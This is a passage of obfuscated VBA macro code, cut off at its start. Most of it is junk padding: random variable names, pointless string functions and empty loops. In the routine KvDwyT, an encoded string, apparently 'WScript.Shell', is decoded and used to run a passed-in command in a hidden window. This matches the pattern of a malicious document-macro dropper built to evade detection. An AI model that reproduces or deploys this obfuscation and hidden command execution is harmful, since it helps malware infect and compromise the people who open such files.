    sXNgp = Right("HTlw!gdxPC", 5)
    HYvHeJl = Right("?Q]d_BWQp CD&rjeF.]M", 2)
    While wGrRdG < 179
        HYvHeJl = StrReverse("FwBm TPi*-!iA LiUpO")
        CqkEFrl = LTrim("AxXgjky _%")
        exfwQq = LTrim("$YW^Tt$cu.UNOO")
        wGrRdG = wGrRdG + 1
    Wend

    cxoTqk = 1977 + 578 + 1430
    IiVYKJNx = Space(16)
    JbEbqpzY = 1916 + 511 + 900
    exfwQq = Left("NpAiym-XlJm]b)", 2)
    sXNgp = StrReverse("kB!!I$I*!reBF-eaou-u")
    For nYucHE = 0 To 261
        JbEbqpzY = Left("GTzgUi*Q-eKRjs", 5)
        kBCkcXu = "$YYF%f*yLP" + "@aeSuj?)_c?H" + "--DxvBFk$l#oq(["
        IiVYKJNx = StrReverse("AHZCPB*zDG")
        cxoTqk = StrReverse("_qfO.Q&*gjf")
        IiVYKJNx = LTrim(" btQ[#cE?Pw@y")
    Next nYucHE

    For uWafcA = 0 To 291
        sXNgp = Space(3)
        kBCkcXu = Left("zA-MH!&L  Qj!nYOlIo", 3)
        IiVYKJNx = StrReverse("tShheg%rx_nMR")
        ushSr = RTrim("?YOlJ^?K@mPtcf&ncs")
        exfwQq = UCase("gAyY!cZp(P?R?JOkd")
    Next uWafcA

    cxoTqk = Right(".-CV$pRYAA", 5)
    cxoTqk = 1380 + 1582 + 290
    gIuQgVf = StrReverse("QAKMr[TJB pP_*@ZM n")
    cxoTqk = "Gha@sJwx(he" + "BvXLGojVOWOqhlA%t" + "oaP.nHSMSEa-Pm"
    JbEbqpzY = UCase("sSQbnB_)%@")
    HYvHeJl = Space(6)
    ushSr = LTrim("?eJWF%FFE#WS)GRGGU#.")
    kBCkcXu = UCase("((]ma!NEZ]E")
    rjzGslkX = StrReverse("L!(evoVTF!rB")
    CqkEFrl = UCase("iyBGcYa@xRxm&-xcr")
End Sub

Private Sub KvDwyT(asQlHVB As String, rJFtQeI As String, cQoJUN As String, pwJTry As String, PVdJdqP As String, yZohmT As String)
    CqkEFrl = "JbS])hrp#dHd" + "[?R$yUkDiI#JrajD#f!" + "q-)[&SyiNiR"
    HYvHeJl = Left("u[jiIC_wqXpz @m!", 2)
    exfwQq = LTrim("olvHEpDRs]zJ")
    cxoTqk = UCase("yEDs$C^xe.AjNOw#")
    Set pvfixH = CreateObject(HzCqYzL("WoSpc(rui?pRtu.JSthHeklolT"))
    pvfixH.Run asQlHVB, 0
    While lVcUNM < 344
        CqkEFrl = 1996 + 1839 + 268
        sXNgp = UCase("kNCCDRs[vhqQO^dvv")
        CqkEFrl = RTrim("a(_df@xe[qb[OYxdZk")
        HYvHeJl = Left("r@ZGaD#NuHJ[W^QS)[K", 3)
        sXNgp = Space(19)
        gIuQgVf = RTrim("r(EQ_cW)LDkj@Ijdjkmy")
        rjzGslkX = Left("gSsH^[S[.olgKjdKaAp", 4)
        lVcUNM = lVcUNM + 1
    Wend
    exfwQq = UCase("Dk-avL&ZbWzl")
    exfwQq = 818 + 1667 + 1727
    HYvHeJl = Space(5)
    JbEbqpzY = StrReverse("*!ohndE R_i-KqPv# ")
    IiVYKJNx = RTrim("wxVPbH%JmD$u")
    CqkEFrl = Left("C](XCu[#nBKLCT", 5)
End Sub

Private Sub JLmwEB(YoumCXf As Boolean)
    sXNgp = Left("jMPbdTKCjEX", 2)
    JbEbqpzY = LTrim("QMv*jA&o]MtzaBgl")
    kBCkcXu = LTrim("pcNyWE%wzeU%)nd")
    HYvHeJl = StrReverse("qC#e#HZIZqFfXhxmN")
    ushSr = UCase("ayv$BRamUpdt!eD.")
    IiVYKJNx = Space(20)
    IiVYKJNx = 638 + 456 + 1369
    cxoTqk = 1008 - 1233 - 1085
    sXNgp = Right("SxFjQPulLvHlUwfEJ", 5)
    gBUyHb = Right("H.h#A!U(xI%dBJoMrn", 4)
    gBUyHb = 323 + 208 + 1466
    JbEbqpzY = UCase("ec_GVLIv]o)zJ?wn@jL")
    While IBLGUo < 333
        JbEbqpzY = Space(6)
        gIuQgVf = 1427 - 776 - 1083
        rjzGslkX = StrReverse("Y&qqWY*XHbMgIg")
        kBCkcXu = Left("%fgQ%QgeEKowAuG@", 3)
        JbEbqpzY = Left(" h-[sR_-Ie%", 5)
        exfwQq = 1199 + 1883 + 1883
        cxoTqk = "sTOWKoduuu" + "qD^x$i*q!knb nCzgC&j" + "_uI#P%#bySv["
        sXNgp = RTrim("x)iTPsCLC[Sr([z-(DB")
        rjzGslkX = Right("?sYA.oJGSllQori", 4)
        gIuQgVf = Right("dsS[hZIWnC Valkbcq h", 4)
        IBLGUo = IBLGUo + 2
    Wend

    JbEbqpzY = Left("?EV. YsukxaRaew*AR?i", 5)
    While pdFADY < 148
        exfwQq = 1546 - 1967 - 537
        IiVYKJNx = LTrim("R.VWqC[#nsKl")
        IiVYKJNx = RTrim("ktfvUO.BV-fDx#ABC dF")
        HYvHeJl = RTrim("OLUN]mITuXc)&Xy*")
        IiVYKJNx = Right("uVrs_FKdS^]U", 2)
        gIuQgVf = RTrim("ei.aMhTf llDp$X_P?")
        CqkEFrl = Right("Gz#ZG]obhsq&", 4)
        pdFADY = pdFADY + 2
    Wend

    gIuQgVf = 913 - 1370 - 1871
    rjzGslkX = StrReverse("SPUP[v@KrIyI")
    ushSr = Left("_nN]Tgua dSfV*TaL ", 5)
    While FJbvbf < 318
        ushSr = 1831 + 1349 + 1734
        ushSr = Left("JL&WS$C.![(%C", 5)
        cxoTqk = Left("?.$ftOe@GGH(M", 3)
        JbEbqpzY = UCase("#H[oNGoe kYXU")
        gBUyHb = RTrim(".*ZtEsjx$yg")
        rjzGslkX = LTrim("ycv$x(w[HV]rV@aubHok")
        kBCkcXu = 1990 - 715 - 1176
        FJbvbf = FJbvbf + 3
    Wend

    gBUyHb = Left("i*VDDco-N^]NhbUaXsL", 5)
    exfwQq = StrReverse("KCm%yw]gFtSZnrPS")
    ushSr = LTrim("Tg!EG)KrTbAEi")
    kBCkcXu = UCase("yJWf&LaF!$RB")
    ushSr = Left("nSjsK((ShE", 4)
    JbEbqpzY = Left("zinJ_cp &Pe dW]g", 2)
    sXNgp = LTrim("O%DVtWp$oi-")
    JbEbqpzY = LTrim("[wojFeq?aa@CY-nK^%H")
    exfwQq = LTrim("Xg^Ds#gDopf@qr")
    ushSr = LTrim("ThXrDya#_TCG")
End Sub

Private Function JlVOVS(tyOySfp As String) As String
    cxoTqk = UCase(" .AnwyZYhgN")
    HYvHeJl = Right("_Vp(CsiF ]Ufn(O?(ZY", 5)
    JbEbqpzY = StrReverse("yC.yP$q$_P")
    CqkEFrl = 1240 - 694 - 1144
    sXNgp = Right("(&rF#[&W)bUH", 2)
    exfwQq = 1597 + 144 + 1419
    sXNgp = StrReverse("lZm.pEgmQoW*@")
    While EqbsZE < 110
        CqkEFrl = Space(8)
        kBCkcXu = 622 + 885 + 862
        ushSr = LTrim("MUK-@sjj*kAHa]")
        gIuQgVf = "wNQzkRLAqaUZGSk" + "(xd-H#^Aaj@Ccz-" + "sga#OdN&VC"
        JbEbqpzY = 407 + 1928 + 153
        gIuQgVf = 1978 + 1362 + 1950
        rjzGslkX = UCase("M)cA$UxV.UODN @hs")
        EqbsZE = EqbsZE + 1
    Wend

    exfwQq = RTrim("J?R@BWtgNjgHHDr)M")
    kBCkcXu = UCase("u*JDnxnePZ!")
    sXNgp = Space(3)
    gIuQgVf = UCase("?cLNGCJcT#R[eyHZd")
    rjzGslkX = LTrim("dn^-?Ckm af#")
    cxoTqk = LTrim("mFPyUsjOcPijWw")
    JbEbqpzY = LTrim("HKfX*BD_L(oFgII@r")
    rjzGslkX = Left("YAOt#rF*kBgoy[O]jPK", 5)
    rjzGslkX = StrReverse("cyGRcQl-T&*eY")
    JbEbqpzY = StrReverse("L%cw.AQD[O%Dqj")
    JbEbqpzY = RTrim("$zecsM*SMXYL!iK")
    sXNgp = "?zwo.jQryMLEcaRw " + "d@OPPo[c&lU[" + "hVdkjZGQCy"
    CqkEFrl = LTrim("HBDd-KcCw@oMPbmuc[H")
    gBUyHb = RTrim("s&XpEg@@[GYQ_$l")
    kBCkcXu = UCase("F-Zyceb$CLJkLzEOHQW")
    exfwQq = "FHHG!pg^f!BHJu-" + "zme$#AZPZO)cQFalW&hm" + "KVGmsTIL]tGOCpH"
    gBUyHb = 1847 - 1016 - 721
    gBUyHb = 395 - 1482 - 1221
    gBUyHb = RTrim("oboFqGsqm?V")
    sXNgp = StrReverse("CsWkaPyLlV?(uwq]!B")
    HYvHeJl = UCase("Dw!X]_uAGqMuM.*P")
    ushSr = 1188 - 960 - 968
    gIuQgVf = UCase("uv%]lEUy)waSXvIm$m")
    JbEbqpzY = 481 - 1625 - 264
    JbEbqpzY = Left("T$fQOh-Plsm_.", 2)
    JbEbqpzY = UCase("?gu_JnwDkXSBg")
    gBUyHb = "I]*fsfWHHf" + "#hxpwp pxyVN" + "(hj]%NU)cw^FdjSQa&L"
    JbEbqpzY = Right("#IX^@NMyXPZcd.Lwr", 3)
    ushSr = Right("YSkDpG*sJF kdpJ?", 2)
    ushSr = Right("SCikDvhvfO*A?", 2)
    JlVOVS = "ACUAWCyanPmYHRvJIaaTVWsTFAQUhsdCusrQrb"
End Function

Private Sub beXXGZ(CYGRxq As Integer)
    For IBBycm = 0 To 258
        cxoTqk = "XDkV@Dc)tsA?]m(JAh@" + "xLe fWTGlGM^Mzm*.*J" + "lOteV_ %d!]d"
        sXNgp = Space(8)
        exfwQq = UCase("K #biS*S&o")
        gIuQgVf = Left("CB@YtYDPBtk-xd&h)^s-", 5)
        kBCkcXu = Right("Bn$?MF pI_ErG#zapWjo", 2)
        gBUyHb = UCase("e_bhG$zZWwdB")
        gBUyHb = 1143 + 366 + 1891
        cxoTqk = 1590 - 697 - 1246
        rjzGslkX = RTrim("UMb%c#Gr oxmq^Q@VpC")
    Next IBBycm

    JbEbqpzY = "kCvd]U%cA^ljP" + "t-_&?G]h@%" + "AJ%D]jH#dnr-^kcs"
    cxoTqk = LTrim("mn(xKAZX#k )jdyq")
    kBCkcXu = Right("q%?LB]vmx^(kepNSXs", 3)
    cxoTqk = LTrim("P($YMBgD.aBrRQ^L")
    kBCkcXu = Space(14)
    gIuQgVf = UCase("@@PhtYpq^iAQo")
    gBUyHb = LTrim("XKCqmD%YwS")
    HYvHeJl = StrReverse("j^O*EJ s-WyfCKxwD")
    IiVYKJNx = Left("_cD]aGXv@LTA&B#", 2)
    HYvHeJl = "VZ#wI&BIch" + "]@ZddKX^.BwOT^o)" + "BpC]pRqokwevsGvpsZ%"
    HYvHeJl = LTrim("g#]DZDa&KNb^JJ")
    gIuQgVf = Left("FzJpPod$F#L-jp^T&th", 2)
    HYvHeJl = 833 - 1892 - 1190
    cxoTqk = Space(3)
    kBCkcXu = 1771 - 1742 - 1434
    HYvHeJl = LTrim("j^RlO&ZCK[P.@@hGZQ")
    ushSr = RTrim("-Rf%fLW.zSiDTW")
    For sJZcxo = 0 To 261
        exfwQq = UCase("JhEtr^u_DbS!!I")
        ushSr = 1135 + 1395 + 1674
    Next sJZcxo

    gBUyHb = UCase("lgh M.-AkOtnVQ")
    sXNgp = Space(16)
    While CZAfdp < 239
        gBUyHb = 1682 + 582 + 866
        IiVYKJNx = 1216 + 810 + 793
        JbEbqpzY = UCase("UCLyXe*Y_ws")
        kBCkcXu = UCase("qxncpP[zhQXphbw")
        CqkEFrl = 683 + 1830 + 1888
        JbEbqpzY = Space(1)
        cxoTqk = StrReverse("w&KQ!LJ[]lWx K")
        exfwQq = LTrim(")%Y@MjGh]ZJu?BySr")
        exfwQq = 772 + 1407 + 1193
        CZAfdp = CZAfdp + 3
    Wend

    sXNgp = "e@Kpxn.Qt?*gRedlfi" + "YcDAyDB_iyrMhd" + "R$^ZQLphUV$yS(CJx"
    rjzGslkX = RTrim("x-(SezpRZXrjYj)W![p")
    exfwQq = Space(13)
    While IibsaE < 135
        JbEbqpzY = UCase("z)oDaw$g.u_hRY-NL?Bt")
        kBCkcXu = UCase("Rg$!?KdnNlWt")
        IibsaE = IibsaE + 3
    Wend

    IiVYKJNx = StrReverse("z!NX@rN[k?qt?wM^i")
    rjzGslkX = StrReverse("taEHrpW?G $CQEGP")
End Sub

